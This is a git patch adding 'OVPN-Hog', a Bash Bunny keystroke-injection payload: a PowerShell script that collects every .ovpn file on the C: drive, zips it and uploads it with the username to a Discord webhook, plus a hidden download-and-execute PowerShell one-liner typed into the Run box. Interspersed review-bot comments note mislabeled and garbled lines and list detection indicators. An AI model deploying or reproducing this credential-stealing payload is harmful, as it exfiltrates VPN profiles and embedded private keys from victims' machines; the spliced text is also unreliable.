From 78bcc5dc7b301b93dfc75d5e237a93986d97f047 Mon Sep 17 00:00:00 2001
From: Gavin Kramer <75549184+atomiczsec@users.noreply.github.com>
Date: Fri, 14 Jul 2023 11:10:55 -0400
Subject: [PATCH] Add files via upload
---
BashBunny/payloads/OVPN-Hog/o.ps1 | 46 +++++++++++++
BashBunny/payloads/OVPN-Hog/payload.txt | 13 ++++
BashBunny/payloads/OVPN-Hog/readme.md | 87 +++++++++++++++++++++++++
3 files changed, 146 insertions(+)
create mode 100644 BashBunny/payloads/OVPN-Hog/o.ps1
create mode 100644 BashBunny/payloads/OVPN-Hog/payload.txt
create mode 100644 BashBunny/payloads/OVPN-Hog/readme.md
diff --git a/BashBunny/payloads/OVPN-Hog/o.ps1 b/BashBunny/payloads/OVPN-Hog/o.ps1
new file mode 100644
index 0000000..b700227
--- /dev/null
+++ b/BashBunny/payloads/OVPN-Hog/o.ps1
@@ -0,0 +1,46 @@
+function OVPN-Hog {
+ [CmdletBinding()]
+ param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+ )
+
+ $hookurl = 'DISCORD-WEBHOOK'
+
+ $Body = @{
+ 'username' = $env:username
+ 'content' = $text
+ }
+
+ if (-not ([string]::IsNullOrEmpty($text))) {
+ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
+ }
+
+ if (-not ([string]::IsNullOrEmpty($file))) {
+ curl.exe -F "file1=@$file" $hookurl
+ }
+}
+
+$Drive = "C:"
+
+$Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse
+
+if ($Files) {
+ $types = @{
+ "*.ovpn" = "OpenVPN"
+ }
+
+ foreach ($type in $types.Keys) {
+ $filteredFiles = $Files | Where-Object { $_.Name -like $type }
+
+ if ($filteredFiles) {
+ $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip"
+
+ $filteredFiles | Compress-Archive -DestinationPath $zipFile
+
+ OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files"
+ }
+ }
+}
diff --git a/BashBunny/payloads/OVPN-Hog/payload.txt b/BashBunny/payloads/OVPN-Hog/payload.txt
new file mode 100644
index 0000000..aac697b
--- /dev/null
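Review bot: o.ps1 has no header comment, so nothing in the file states what data leaves the host or what the script leaves behind. From the visible lines, every `*.ovpn` file under `C:` is zipped to `OpenVPN.zip` in `$env:TEMP`, that archive is never removed, and it is posted together with `$env:username` to `$hookurl` through `Invoke-RestMethod` and `curl.exe -F`. I would add above `function OVPN-Hog` a comment such as `# Artifacts: writes $env:TEMP\OpenVPN.zip (not removed); sends $env:username and the archive to $hookurl via Invoke-RestMethod and curl.exe`. OpenVPN profiles can embed inline certificates and private keys, so any profile collected this way should be treated as exposed and reissued. The same facts serve as indicators for responders: a `curl.exe` child of PowerShell posting multipart data, and a fresh `OpenVPN.zip` in the user's temp directory.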
+++ b/BashBunny/payloads/OVPN-Hog/payload.txt
@@ -0,0 +1,13 @@
+REM Title: Doc-Hog
+REM Author: atomiczsec
+REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook.
+
+
+REM Target: Windows 10
+QUACK DELAY 2000
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl
+QUACK ENTER
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
diff --git a/BashBunny/payloads/OVPN-Hog/readme.md b/BashBunny/payloads/OVPN-Hog/readme.md
new file mode 100644
index 0000000..6df607d
--- /dev/null
+++ b/BashBunny/payloads/OVPN-Hog/readme.md
@@ -0,0 +1,87 @@
+
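Review bot: The header of payload.txt does not identify the payload it ships with: `REM Title: Doc-Hog` sits in the OVPN-Hog directory, and the last REM line ends in a fused fragment, `properlymode con:cols=14 lines=1`, that looks like a leftover from another file. The title should read `REM Title: OVPN-Hog` and the stray fragment should be dropped from the comment. `REM Target: Windows 10` also disagrees with the readme, which lists Windows 10 and 11. For anyone writing detections from this file, the `QUACK STRING` line is the indicator to key on: a hidden, non-interactive `powershell` launched from the Run dialog with `-ep Bypass` that feeds `iwr` output to `iex`, which process-creation and script-block logging both record.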

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# OVPN-Hog + +A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn). + +## Description + +This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook. + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +
+ + Link + +
+ + +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

\ No newline at end of file